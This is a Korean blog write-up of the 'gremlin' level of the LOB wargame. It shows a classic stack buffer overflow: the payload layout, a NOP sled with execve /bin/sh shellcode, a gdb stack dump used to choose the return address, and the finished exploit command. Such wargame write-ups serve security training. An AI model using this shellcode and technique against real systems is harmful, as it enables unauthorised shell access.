쉘코드가 들어가는 전형적인 Buffer Overflow 해킹 문제이다.
simple BOF라고 해서, 처음에 구버전인 RedHat 6.2에서 root권한을 따기위해서 아등바등 했었던것이 기억이 난다.
buffer의 크기는 256.
간단하게 payload 구성을 보자.
[buffer (256 bytes)] + [ebp (4bytes)] + [ret (4bytes) ]
간단하게 페이로드를 구성을 해보았다.
buffer부터 ebp까지는 260bytes이다.
그러니 그 안에 nop slide와 shellcode를 집어넣으면 된다.
payload는 다음과 같다.
$(python -c 'print "\x90"*200 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36
nop slide는 다음 명령어로 계속 차례를 넘기는 기능을 수행하니 대충 90이 위치한 자리를 ret에 덮으면 된다.
(gdb) x/100x $esp-100
0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd8: 0x90909090 0x90909090 0x6850c031 0x68732f2f
0xbffffbe8: 0x69622f68 0x50e3896e 0x99e18953 0x80cd0bb0
0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc18: 0x90909090 0x4000fdf4 0x00000002 0xbffffc64
0xbffffc28: 0xbffffc70 0x40013868 0x00000002 0x08048380
0xbffffc38: 0x00000000 0x080483a1 0x08048430 0x00000002
0xbffffc48: 0xbffffc64 0x080482e0 0x080484bc 0x4000ae60
0xbffffc58: 0xbffffc5c 0x40013e90 0x00000002 0xbffffd50
0xbffffc68: 0xbffffd67 0x00000000 0xbffffe6e 0xbffffe90
0xbffffc78: 0xbffffe9a 0xbffffea8 0xbffffec7 0xbffffed4
0xbffffc88: 0xbffffeed 0xbfffff07 0xbfffff11 0xbfffff1f
0xbffffc98: 0xbfffff5f 0xbfffff6f 0xbfffff84 0xbfffff94
0xbffffca8: 0xbfffff9e 0xbfffffba 0xbfffffc5 0xbfffffd2
0xbffffcb8: 0xbfffffda 0x00000000 0x00000003 0x08048034
0xbffffcc8: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffcd8: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffce8: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffffcf8: 0x0000000b 0x000001f4 0x0000000c 0x000001f4
0xbffffd08: 0x0000000d 0x000001f4 0x0000000e 0x000001f4
0xbffffd18: 0x00000010 0x0febfbff 0x0000000f 0xbffffd4b
0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffd48: 0x69000000 0x00363836 0x6d6f682f 0x61672f65
0xbffffd58: 0x742f6574 0x672f706d 0x6c6d6572 0x90006e69
0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe28: 0x90909090 0x31909090 0x2f6850c0 0x6868732f
0xbffffe38: 0x6e69622f 0x5350e389 0xb099e189 0x9080cd0b
0xbffffe48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe68: 0xf4909090 0x454c00fd 0x504f5353 0x7c3d4e45
0xbffffe78: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073
0xbffffe88: 0x68732e65 0x00732520 0x52455355 0x454d414e
0xbffffe98: 0x4948003d 0x49535453 0x313d455a 0x00303030
0xbffffea8: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61
0xbffffeb8: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69
0xbffffec8: 0x414e474f 0x673d454d 0x00657461 0x4f4d4552
(gdb)
0xbffffed8: 0x4f484554 0x353d5453 0x36322e39 0x3931312e
0xbffffee8: 0x3636312e 0x49414d00 0x762f3d4c 0x732f7261
0xbffffef8: 0x6c6f6f70 0x69616d2f 0x61672f6c 0x54006574
0xbfffff08: 0x3d4d5245 0x69736e61 0x534f4800 0x50595454
0xbfffff18: 0x33693d45 0x50003638 0x3d485441 0x7273752f
0xbfffff28: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962
0xbfffff38: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72
0xbfffff48: 0x2f365231 0x3a6e6962 0x6d6f682f 0x61672f65
0xbfffff58: 0x622f6574 0x48006e69 0x3d454d4f 0x6d6f682f
0xbfffff68: 0x61672f65 0x49006574 0x5455504e 0x2f3d4352
0xbfffff78: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbfffff88: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbfffff98: 0x7461673d 0x41420065 0x455f4853 0x2f3d564e
0xbfffffa8: 0x656d6f68 0x7461672f 0x622e2f65 0x72687361
0xbfffffb8: 0x414c0063 0x653d474e 0x53555f6e 0x54534f00
0xbfffffc8: 0x3d455059 0x756e694c 0x48530078 0x3d4c564c
0xbfffffd8: 0x534c0031 0x4c4f435f 0x3d53524f 0x6f682f00
0xbfffffe8: 0x672f656d 0x2f657461 0x2f706d74 0x6d657267
0xbffffff8: 0x006e696c 0x00000000 Cannot access memory at address
0xc0000000
대충 리턴어드레스를 0xbffffdf8로 잡아주자...
그러면 페이로드가 완성된다.
./gremlin $(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36+"\xf8\xfd\xff\xbf"')
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
orge -> troll (0) | 2014.02.20 |
---|---|
darkelf->orge (0) | 2014.02.20 |
wolfman -> darkelf (0) | 2014.02.20 |
orc -> wolfman (0) | 2014.02.20 |
gremlin -> cobolt (0) | 2014.02.20 |